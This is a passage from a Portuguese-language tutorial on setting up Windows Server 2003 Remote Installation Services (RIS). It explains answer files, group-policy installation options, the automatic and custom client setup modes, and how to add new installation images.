Nota: Mesmo que o usuário defina um nome de computador no arquivo de respostas, este não será utilizado, e veremos adiante como isso será feito. Caso queira averiguar, gere o arquivo definindo um nome de computador. Abra o arquivo de respostas com o bloco de notas e veja que o nome de computador é uma variável!

A outra opção para associar um arquivo de respostas é mais trabalhosa, mas caso a queira utilizar, acesse “Usuários e Computadores do Active Directory” e procure pelo computador onde o RIS está instalado. Acesse suas propriedades e clique na aba referente à Instalação Remota.
Clique em “Opções Avançadas” e depois na aba “imagens”. Clique no botão “adicionar” e siga o assistente. Tudo que ele fará é copiar o arquivo de um local X para o local Y, no caso, o diretório:

D:\RemoteInstall\Setup\Portuguese\Images\WINXP\i386\templates

As figuras a seguir demonstram o passo-a-passo do procedimento descrito acima, além de mostrar o que discutimos sobre o nome do computador & variáveis.

Acesse as “Configurações Avançadas”…

…verifique a questão do “formato de nome do computador”…

…e as imagens/arquivos de resposta na aba “imagens”.

Antes de falarmos sobre as opções de instalação, vale lembrar que só estarão disponíveis caso o administrador as defina nas diretivas de grupo do domínio em questão. Edite esta diretiva, procurando na seção “Configuração do Usuário > Configurações do Windows > Serviços de Instalação Remota”. Não tem como errar! Faça as alterações necessárias, vamos adiante e lembre-se: não abordaremos a opção “Ferramentas”!

Ponto-Chave: Volte a consultar este tópico no momento em que formos instalar o sistema no cliente.

Instalação Automática: Nesta opção, a instalação utilizará as configurações de nome e localização da conta de computador de acordo com o que for definido na tela de configuração do RIS (Usuários e Computadores do Active Directory > Propriedades do Computador que abriga o RIS > Aba de Instalação Remota). Logo na primeira tela podemos encontrar as convenções de nome que podem ser utilizadas. Alguns exemplos: nome do usuário, número seqüencial, ou alguma seqüência de caracteres customizados.

Nota: Caso as diretivas não estejam definidas, esta será a única opção do usuário, e entrará automaticamente.

Instalação Customizada: Nesta opção, a instalação utilizará as configurações de nome e localização da conta de computador definidos pelo usuário. É uma ótima opção, pois é uma boa prática das empresas criarem um padrão de nomes para os computadores de acordo com o setor, etc. Assim o usuário ficará livre para utilizar um nome mais apropriado, de acordo com sua necessidade.

O próximo passo é a escolha do Sistema Operacional a ser instalado, porém, como criamos apenas uma imagem, não veremos outras opções. Caso queira, adicione posteriormente uma nova imagem, do Windows 2000 Pro, por exemplo. Leia no final deste documento o tópico extra sobre este assunto.

Caso queira adicionar outra imagem agora, veja na figura abaixo o assistente:

Voltando à nossa instalação, perceba que na tela em que escolhemos o sistema operacional, escolheremos na verdade qual arquivo de respostas será utilizado.

Ex.: Se possuo dois arquivos de respostas distintos, para instalação do Windows XP Pro, a instalação disponibilizará DUAS opções para este sistema operacional, mas a imagem que criamos é única, portanto o Windows XP será instalado a partir desta imagem, porém de acordo com o arquivo de respostas escolhido. Pode parecer confuso, mas a idéia é simples. O que ocorre, é que o processo é transparente para o usuário do serviço.

Dica: Edite o arquivo de respostas com o bloco de notas e altere sua descrição (no final do arquivo) para que fique algo documentado, resumidamente. Ex.: “Windows XP Pro SP2 com teclado ABNT2” ou “Windows XP Pro SP1 padrão”.

Após definir qual sistema será instalado, chegamos praticamente ao propósito final e teórico do RIS! No próximo tópico, faremos a instalação completa e automatizada de uma estação Windows XP Professional utilizando nosso servidor RIS!

:: Instalação do Cliente ::

Espero que já tenha preparado seu ambiente de testes! A seguir, podemos ver o boot através da interface de rede, já buscando um endereço via DHCP.

A próxima tela, é a famosa “welcome.osc”…

…e abaixo, “login.osc”:

Perceba que o serviço solicita a entrada de credenciais e informa o nome do domínio ao qual estou conectado, além do nome do servidor RIS, no caso, “MARGE” (isso mesmo, Marge Simpson…)

Na tela a seguir, podemos ver as opções de instalação, definidas via diretiva.

Se for escolhida a opção “Automática”, a instalação solicitará apenas que o usuário escolha a imagem a ser utilizada (arquivo de repostas/imagem, como discutido anteriormente). Caso haja apenas um arquivo de respostas/imagem, só haverá uma única opção. No exemplo abaixo, deixei o arquivo gerado pelo RIS e criei um personalizado, que já inclui a modesta chave do Windows, além de outras opções.

Lembre que nesse caso, o NOME da máquina será gerado de acordo com o padrão definido nas opções no Servidor RIS!

Se for escolhida a opção personalizada (custom setup), o usuário terá a liberdade para definir alguns parâmetros como Nome e localização da conta do Computador no domínio. Se colocarmos apenas o nome do computador, a conta será criada na Unidade Organizacional default, que é “Computers”.

A opção “Restart a Previous…” serve para continuar uma instalação que não obteve sucesso anteriormente. Se os arquivos básicos de instalação já tiverem sido copiados, estes não serão transferidos novamente.

A última opção refere-se às ferramentas de diagnóstico e resolução de problemas, mas como informado anteriormente, não as abordarei neste artigo.

Na imagem a seguir, recebemos um aviso antes da instalação do novo sistema:

Como optei pelo modo automático e também pela imagem associada ao meu arquivo de respostas, a instalação utilizará o arquivo de respostas criado por mim para efetuar a instalação. Perceba que o nome da máquina foi atribuído pela opção definida no servidor RIS e não pelo usuário, o que não ocorre no modo “custom”.

Após pressionarmos [ENTER], chegamos à próxima tela, a famosa “text-based installation” do Windows XP. A partir daí, se tudo estiver correto, a instalação será 100% automatizada, sem que você aperte uma tecla sequer.

Se você chegou até aqui, parabéns! O Servidor RIS foi implantado com sucesso!
A seguir, faço algumas recomendações básicas e disponibilizei também um tópico extra, para a instalação de novas imagens.

:: Práticas Recomendadas ::

1-Não utilize este recurso sobre redes lentas, ou WANs (que também costumam ser lentas se comparadas às LANs).

2-O RIS utiliza basicamente recursos de transferência de dados, portanto dê preferência a um disco dedicado no servidor.

:: Tópico Extra – Adicionando novas imagens em idioma nativo/não-nativo ::::

Acesse as Ferramentas Administrativas e clique sobre o item “Programa de Instalação dos Serviços de instalação remota.

Neste momento, duas opções serão disponibilizadas para o usuário, e escolheremos a primeira (“adicionar uma nova imagem…”). O assistente solicitará que você insira a mídia (ou outro local) contendo os arquivos de instalação do sistema operacional. Insira a mídia e prossiga. As demais opções são básicas e meramente informativas, com exceção de uma, onde o usuário terá que escolher entre três opções definidas por radio-buttons.

Lembre-se: caso queira alterar a descrição, NÃO utilize caracteres especiais (acentos etc.), pois as telas de instalação do RIS (os arquivos .osc) não suportam esta codificação.

Nota: Fique atento apenas na última tela que antecede a cópia do CD, onde o assistente pode ou não questionar o usuário sobre o que fazer com as telas de instalação do RIS.

Ponto-Chave: Caso o Windows pergunte algo sobre “telas de instalação”, marque a opção “utilizar as telas atuais”, caso contrário as telas que foram personalizadas serão substituídas.

Conclusão

Com este artigo/tutorial, mostramos como instalar o Serviço de Instalação Remota (RIS) no Windows Server 2003 .

Fonte: http://www.andersonpatricio.org/Tutoriais/AP754_b.html